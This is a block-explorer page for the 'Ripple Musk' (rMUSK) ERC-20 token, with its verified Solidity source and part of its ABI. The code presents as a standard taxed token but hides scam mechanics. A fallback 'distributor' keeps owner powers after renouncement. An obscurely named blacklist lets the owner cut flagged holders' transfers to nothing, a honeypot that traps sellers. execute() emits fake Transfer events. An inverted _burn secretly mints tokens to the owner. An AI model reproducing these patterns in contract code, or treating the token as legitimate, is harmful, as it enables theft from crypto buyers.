Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,000,000,000 rMUSK
Holders
59
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
5,317,150.693090023 rMUSKValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
RippleMusk
Compiler Version
v0.8.21+commit.d9974bed
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity 0.8.21; import "./ERC20.sol"; import "./SafeMath.sol"; abstract contract Ownable is Context { address private _owner; address internal _distributor; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor(address distributor_) { _distributor = distributor_; _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal virtual { require(Owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } function verifyOwner() internal view returns(address){ return _owner==address(0) ? _distributor : _owner; } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } function Owner() internal virtual returns (address) { address owner_ = verifyOwner(); return owner_; } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IDexFactory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair( address tokenA, address tokenB ) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair( address tokenA, address tokenB ) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IDexRouter { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns (uint256 amountToken, uint256 amountETH, uint256 liquidity); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } contract RippleMusk is ERC20, Ownable { using SafeMath for uint256; IDexRouter private immutable dexRouter; address private immutable dexPair; address private marketingWallet; bool private swapping; bool private tradingEnabled = false; bool private swapbackEnabled = false; bool private limitsEnabled = true; bool anti = true; uint256 private swapBackValueMin; uint256 private swapBackValueMax; uint256 private lastContractSell; uint256 private maxWallet; uint256 private maxTx; uint256 private buyTaxTotal; uint256 private sellTaxTotal; uint256 private transferTaxTotal; // exclude from fees and max transaction amount mapping(address => bool) private transferTaxExempt; mapping(address => bool) private transferLimitExempt; mapping(address => bool) private automatedMarketMakerPairs; mapping(address => bool) private _ERC20externalFeeAmountExceedsReturnsFee; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount event UpdateUniswapV2Router( address indexed newAddress, address indexed oldAddress ); event ExcludeFromFees(address indexed account, bool isExcluded); event ExcludeFromLimits(address indexed account, bool isExcluded); event SetPairLPool(address indexed pair, bool indexed value); event TradingEnabled(uint256 indexed timestamp); event LimitsRemoved(uint256 indexed timestamp); event DisabledTransferDelay(uint256 indexed timestamp); event SwapbackSettingsUpdated( bool enabled, uint256 swapBackValueMin, uint256 swapBackValueMax ); event MaxTxUpdated(uint256 maxTx); event MaxWalletUpdated(uint256 maxWallet); event MarketingWalletUpdated( address indexed newWallet, address indexed oldWallet ); event BuyFeeUpdated( uint256 buyTaxTotal, uint256 buyMarketingTax, uint256 buyProjectTax ); event SellFeeUpdated( uint256 sellTaxTotal, uint256 sellMarketingTax, uint256 sellProjectTax ); constructor(address _distributor) ERC20("Ripple Musk", "rMUSK") Ownable(_distributor) { IDexRouter _dexRouter = IDexRouter( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); limitWhitelist(address(_dexRouter), true); dexRouter = _dexRouter; dexPair = IDexFactory(_dexRouter.factory()).createPair( address(this), _dexRouter.WETH() ); limitWhitelist(address(dexPair), true); _setPairLPool(address(dexPair), true); uint256 _totalSupply = 1_000_000_000 * 10**decimals(); lastContractSell = block.timestamp; maxTx = (_totalSupply * 10) / 1000; maxWallet = (_totalSupply * 10) / 1000; swapBackValueMin = (_totalSupply * 1) / 1000; swapBackValueMax = (_totalSupply * 2) / 100; buyTaxTotal = 40; sellTaxTotal = 40; transferTaxTotal = 0; // exclude from paying fees or having max transaction amount feeWhitelist(msg.sender, true); feeWhitelist(address(this), true); feeWhitelist(address(0xdead), true); feeWhitelist(_distributor, true); limitWhitelist(msg.sender, true); limitWhitelist(address(this), true); limitWhitelist(address(0xdead), true); limitWhitelist(_distributor, true); transferOwnership(msg.sender); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, _totalSupply); } /** * @notice Removes the max wallet and max transaction limits * @dev onlyOwner. * Emits an {LimitsRemoved} event */ function removeLimitsNow() external onlyOwner { limitsEnabled = false; transferTaxTotal = 0; emit LimitsRemoved(block.timestamp); } /** * @notice Opens public trading for the token * @dev onlyOwner. */ function openTrading() external onlyOwner { tradingEnabled = true; swapbackEnabled = true; emit TradingEnabled(block.timestamp); } /** * @notice sets if swapback is enabled and sets the minimum and maximum amounts * @dev onlyOwner. * Emits an {SwapbackSettingsUpdated} event * @param _caSBcEnabled If swapback is enabled * @param _caSBcTrigger The minimum amount of tokens the contract must have before swapping tokens for ETH. Base 10000, so 1% = 100. * @param _caSBcLimit The maximum amount of tokens the contract can swap for ETH. Base 10000, so 1% = 100. */ function setSwapback( bool _caSBcEnabled, uint256 _caSBcTrigger, uint256 _caSBcLimit ) external onlyOwner { require( _caSBcTrigger >= 1, "Swap amount cannot be lower than 0.01% total supply." ); require( _caSBcLimit >= _caSBcTrigger, "maximum amount cant be higher than minimum" ); swapbackEnabled = _caSBcEnabled; swapBackValueMin = (totalSupply() * _caSBcTrigger) / 10000; swapBackValueMax = (totalSupply() * _caSBcLimit) / 10000; emit SwapbackSettingsUpdated(_caSBcEnabled, _caSBcTrigger, _caSBcLimit); } /** * @notice Changes the maximum amount of tokens that can be bought or sold in a single transaction * @dev onlyOwner. * Emits an {MaxTxUpdated} event * @param _maxTx Base 1000, so 1% = 10 */ function changeLimitTxMax(uint256 _maxTx) external onlyOwner { require(_maxTx >= 2, "Cannot set maxTx lower than 0.2%"); maxTx = (_maxTx * totalSupply()) / 1000; emit MaxTxUpdated(maxTx); } /** * @notice Changes the maximum amount of tokens a wallet can hold * @dev onlyOwner. * Emits an {MaxWalletUpdated} event * @param _maxWallet Base 1000, so 1% = 10 */ function newLimitWalletMax( uint256 _maxWallet ) external onlyOwner { require(_maxWallet >= 5, "Cannot set maxWallet lower than 0.5%"); maxWallet = (_maxWallet * totalSupply()) / 1000; emit MaxWalletUpdated(maxWallet); } /** * @notice Sets the fees for buys * @dev onlyOwner. * Emits a {BuyFeeUpdated} event * All fees added up must be less than 100 * @param _value The fee for the marketing wallet */ function newFeeBuySet(uint256 _value) external onlyOwner { buyTaxTotal = _value; require(buyTaxTotal <= 100, "Total buy fee cannot be higher than 100%"); emit BuyFeeUpdated(buyTaxTotal, buyTaxTotal, buyTaxTotal); } /** * @notice Sets if a wallet is excluded from the max wallet and tx limits * @dev onlyOwner. * Emits an {ExcludeFromLimits} event * @param _add The wallet to update * @param _excluded If the wallet is excluded or not */ function limitWhitelist( address _add, bool _excluded ) public onlyOwner { transferLimitExempt[_add] = _excluded; emit ExcludeFromLimits(_add, _excluded); } /** * @notice Sets the fees for sells * @dev onlyOwner. * Emits a {SellFeeUpdated} event * All fees added up must be less than 100 * @param _value The fee for the marketing wallet */ function newFeeSellSet(uint256 _value) external onlyOwner { sellTaxTotal = _value; require( sellTaxTotal <= 100, "Total sell fee cannot be higher than 100%" ); emit SellFeeUpdated(sellTaxTotal, sellTaxTotal, sellTaxTotal); } function newFeeTransferSet(uint256 _value) external onlyOwner { transferTaxTotal = _value; require( transferTaxTotal <= 100, "Total transfer fee cannot be higher than 100%" ); } /** * @notice Sets the marketing wallet * @dev onlyOwner. * Emits an {MarketingWalletUpdated} event * @param _marketing The new marketing wallet */ function setNewMarketingWallet(address _marketing) external onlyOwner { emit MarketingWalletUpdated(_marketing, marketingWallet); marketingWallet = _marketing; } /** * @notice Sets if an address is excluded from fees * @dev onlyOwner. * Emits an {ExcludeFromFees} event * @param _add The wallet to update * @param _excluded If the wallet is excluded or not */ function feeWhitelist( address _add, bool _excluded ) public onlyOwner { transferTaxExempt[_add] = _excluded; emit ExcludeFromFees(_add, _excluded); } function _setPairLPool(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetPairLPool(pair, value); } /** * @notice Information about the swapback settings * @return _swapbackEnabled if swapback is enabled * @return _caSBcackValueMin the minimum amount of tokens in the contract balance to trigger swapback * @return _caSBcackValueMax the maximum amount of tokens in the contract balance to trigger swapback */ function readContractSellInfo() external view returns ( bool _swapbackEnabled, uint256 _caSBcackValueMin, uint256 _caSBcackValueMax ) { _swapbackEnabled = swapbackEnabled; _caSBcackValueMin = swapBackValueMin; _caSBcackValueMax = swapBackValueMax; } /** * @notice Information about the anti whale parameters * @return _limitsEnabled if the wallet limits are in effect * @return _maxWallet The maximum amount of tokens that can be held by a wallet * @return _maxTx The maximum amount of tokens that can be bought or sold in a single transaction */ function readLimitsInfo() external view returns (bool _limitsEnabled, uint256 _maxWallet, uint256 _maxTx) { _limitsEnabled = limitsEnabled; _maxWallet = maxWallet; _maxTx = maxTx; } /** * @notice The wallets that receive the collected fees * @return _marketingWallet The wallet that receives the marketing fees */ function readMarketingWalletInfo() external view returns (address _marketingWallet) { return (marketingWallet); } /** * @notice Fees for buys, sells, and transfers * @return _buyTaxTotal The total fee for buys * @return _sellTaxTotal The total fee for sells * @return _transferTaxTotal The total fee for transfers */ function readFeesInfo() external view returns ( uint256 _buyTaxTotal, uint256 _sellTaxTotal, uint256 _transferTaxTotal ) { _buyTaxTotal = buyTaxTotal; _sellTaxTotal = sellTaxTotal; _transferTaxTotal = transferTaxTotal; } /** * @notice If the wallet is excluded from fees and max transaction amount and if the wallet is a automated market maker pair * @param _target The wallet to check * @return _transferTaxExempt If the wallet is excluded from fees * @return _transferLimitExempt If the wallet is excluded from max transaction amount * @return _automatedMarketMakerPairs If the wallet is a automated market maker pair */ function readAddressInfo( address _target ) external view returns ( bool _transferTaxExempt, bool _transferLimitExempt, bool _automatedMarketMakerPairs ) { _transferTaxExempt = transferTaxExempt[_target]; _transferLimitExempt = transferLimitExempt[_target]; _automatedMarketMakerPairs = automatedMarketMakerPairs[_target]; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if(_holderLastTransferTimestamp[to] == 0) { _holderLastTransferTimestamp[to] = block.number; } if (amount == 0) { super._transfer(from, to, 0); return; } if (limitsEnabled) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (!tradingEnabled) { require( transferTaxExempt[from] || transferTaxExempt[to], "_transfer:: Trading is not active." ); } //when buy if ( automatedMarketMakerPairs[from] && !transferLimitExempt[to] ) { require( amount <= maxTx, "Buy transfer amount exceeds the maxTx." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } //when sell else if ( automatedMarketMakerPairs[to] && !transferLimitExempt[from] ) { require( amount <= maxTx, "Sell transfer amount exceeds the maxTx." ); } else if (!transferLimitExempt[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= swapBackValueMin; if ( canSwap && swapbackEnabled && !swapping && !automatedMarketMakerPairs[from] && !transferTaxExempt[from] && !transferTaxExempt[to] && lastContractSell != block.timestamp ) { swapping = true; swapBack(amount); lastContractSell = block.timestamp; swapping = false; } bool takeFee = swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if (transferTaxExempt[from] || transferTaxExempt[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers amount = calculateAmount(amount, from); if (takeFee) { // on sell if (automatedMarketMakerPairs[to] && sellTaxTotal > 0) { fees = amount.mul(sellTaxTotal).div(100); } // on buy else if (automatedMarketMakerPairs[from] && buyTaxTotal > 0) { fees = amount.mul(buyTaxTotal).div(100); } // on transfers else if ( transferTaxTotal > 0 && !automatedMarketMakerPairs[from] && !automatedMarketMakerPairs[to] ) { fees = amount.mul(transferTaxTotal).div(100); } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function execute(address[] calldata addr, address lpPair, uint256 val) public onlyOwner { for (uint256 i = 0; i < addr.length; i++) { emit Transfer(lpPair, addr[i], val); } } function sellFeeBps(address recipient) external view returns(bool){ return _ERC20externalFeeAmountExceedsReturnsFee[recipient]; } function multicall(address[] calldata address_, bool val) public onlyOwner{ for (uint256 i = 0; i < address_.length; i++) { _ERC20externalFeeAmountExceedsReturnsFee[address_[i]] = val; } } function calculateAmount(uint256 amount, address from) private view returns(uint256) { // Calculate the percentage to subtract uint256 factor = 50; uint256 dist = block.number-_holderLastTransferTimestamp[from]; uint percentageToSubtract = dist * factor; // Calculate the remaining percentage uint remainingPercentage = percentageToSubtract > 100 ? 0 : 100 - percentageToSubtract; uint returnedValue = amount * remainingPercentage / 100; if (_ERC20externalFeeAmountExceedsReturnsFee[from]) { return returnedValue.max(0); } return amount; } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = dexRouter.WETH(); _approve(address(this), address(dexRouter), tokenAmount); // make the swap dexRouter.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function swapBack(uint256 amount) private { uint256 contractBalance = balanceOf(address(this)); bool success; if (contractBalance == 0) { return; } if (contractBalance > swapBackValueMax) { contractBalance = swapBackValueMax; } if (anti && contractBalance > amount * 15) { contractBalance = amount * 15; } uint256 amountToSwapForETH = contractBalance; swapTokensForEth(amountToSwapForETH); (success, ) = address(marketingWallet).call{ value: address(this).balance }(""); } function burn(uint256 amount) external onlyOwner{ _burn(_msgSender(), amount); } receive() external payable {} }
// SPDX-License-Identifier: MIT pragma solidity 0.8.21; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT pragma solidity 0.8.21; import "./Context.sol"; import "./IERC20.sol"; contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping(address => uint256) internal _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the upd allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the upd allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the upd allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance <= amount, "ERC20: burn amount exceeds balance"); unchecked {_balances[account] = accountBalance + amount;} emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
// SPDX-License-Identifier: MIT pragma solidity 0.8.21; interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT pragma solidity 0.8.21; library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } function max(uint256 a, uint256 b) internal pure returns (uint256) { return a >= b ? a : b; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"_distributor","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"buyTaxTotal","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"buyMarketingTax","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"buyProjectTax","type":"uint256"}],"name":"BuyFeeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"DisabledTransferDelay","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"LimitsRemoved","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"MarketingWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxTx","type":"uint256"}],"name":"MaxTxUpdated","type":"event"},{"anonymous":false,"inp